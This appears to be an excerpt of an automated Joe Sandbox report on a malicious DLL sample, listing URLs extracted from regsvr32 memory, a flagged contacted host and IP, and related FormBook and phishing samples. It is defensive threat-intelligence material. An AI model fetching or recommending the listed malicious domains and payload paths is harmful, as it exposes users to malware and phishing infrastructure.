https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ik4zwlBduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNq7lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qO67lqDY.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/Host:	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sectigo.com/CPS0D	audiosrv.dll	false		unknown
https://github.com/JulietaUla/Montserrat)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmhduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmly	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/ot	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwlxdu.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdg18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdi18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://sectigo.com/CPS0	audiosrv.dll	false	URL Reputation: safe	unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKydSBYKcSV-LCoeQqfX1RYOo3ig4vwmBduz8A.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSdo18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmls	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZMkidv18Smxg.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	audiosrv.dll	false	URL Reputation: safe	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xmlertificates	regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xKwdSBYKcSV-LCoeQqfX1RYOo3qPZZclSds18Q.woff2)	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427432119.0000000002EFE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/404	regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	audiosrv.dll	false	URL Reputation: safe	unknown
https://manageintel.com/cies	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qOK7l.woff2	regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	audiosrv.dll	false	URL Reputation: safe	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xmlFindOIDInfo	regsvr32.exe, 00000003.00000002.2427314775.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://img1.wsimg.com/isteam/videos/uA41GmyyG8IMaxXdb	regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://manageintel.com/S_1	regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427394559.0000000002EBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
76.223.105.230	manageintel.com	United States		16509	AMAZON-02US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1544424
Start date and time:	2024-10-29 12:05:33 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	audiosrv.dll
Detection:	MAL
Classification:	mal64.troj.evad.winDLL@14/0@1/1
Cookbook Comments:	Found application associated with file extension: .dll

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: audiosrv.dll

Simulations

Behavior and APIs

Time	Type	Description
07:06:24	API Interceptor	10x Sleep call for process: regsvr32.exe modified
07:06:27	API Interceptor	10x Sleep call for process: rundll32.exe modified
07:06:33	API Interceptor	11x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
76.223.105.230	http://asgardcapitalpartners-sharepoint.com	Get hash	malicious	HTMLPhisher	Browse	asgardcapitalpartners-sharepoint.com/
	rDebitadvice22_10_2024.exe	Get hash	malicious	FormBook	Browse	www.falconheights.net/08w1/
	7v8szLCQAn.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/p273/
	#GtantTTcopy.exe	Get hash	malicious	FormBook	Browse	www.stratogent.info/1c49/
	NEW INVOICE.exe	Get hash	malicious	FormBook	Browse	www.stratogent.info/1c49/
	SOA SIL TL382920.exe	Get hash	malicious	FormBook	Browse	www.stratogent.info/f3n5/
	Arrival notice.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/cjvv/?EZ2lo=4S8XY8l3MvvMOMyL3KrDz8kPPAGqnGng5tYYPWDdvWcwX33CgHNrDDjfFme/uWZ2yYnPkPJRTtnUR7GmwOpWBkY/43NiHjgDg3aX97mZZ8znKIfN0Q==&7NP=7FXXUPl
	TRmSF36qQG.exe	Get hash	malicious	FormBook	Browse	www.beauinthedark.net/bopi/?0T5=UL08qvZHLtV&EnAHS=ehvyC7UB7hPuNgJOlic60RckWGiOc4a88OD9LEjvmuzDnOCQ0tva4reQ7SFxdnJvODYI
	http://cloudsharehubs.com	Get hash	malicious	HTMLPhisher	Browse	cloudsharehubs.com/
	Amended Proforma #U2013 SMWD5043.exe	Get hash	malicious	FormBook	Browse	www.wearenotgoingback.info/p273/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
manageintel.com	smphost.dll	Get hash	malicious	Unknown	Browse	185.14.31.158
manageintel.com	smphost.dll	Get hash	malicious	Unknown	Browse	185.14.31.158

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://docs.google.com/drawings/d/1OzqwiA1nI8GUoiKob_qJY5xL1HmGK6VrRXlYUDuD68w/preview?pli=1JXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrlytjEsfyxX4slH6ZHg3eWCKKhJXThK7wTKLJQKP6wUqAFkc0vrl	Get hash	malicious	Mamba2FA	Browse	18.245.31.5
	Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..eml	Get hash	malicious	HTMLPhisher	Browse	13.33.187.48
	Jo Smalley shared _Harbour Healthcare Ltd Project_ with you..eml	Get hash	malicious	HTMLPhisher	Browse	13.33.187.53
	la.bot.mips.elf	Get hash	malicious	Unknown	Browse	3.191.11.150
	https://dvhpkbq.sharing.bublup.com/mybublup/#/mystuff/001-f-cb6f5ea2-07bf-4021-a767-4b4547f8c10b/mixed?lid=001-si-_s1J1-rGiVhh	Get hash	malicious	HTMLPhisher	Browse	3.161.82.109
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	13.218.244.3
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	54.97.116.108
	la.bot.arm.elf	Get hash	malicious	Unknown	Browse	3.203.26.57
	arm5.elf	Get hash	malicious	Unknown	Browse	15.229.58.214
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	18.243.53.46

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
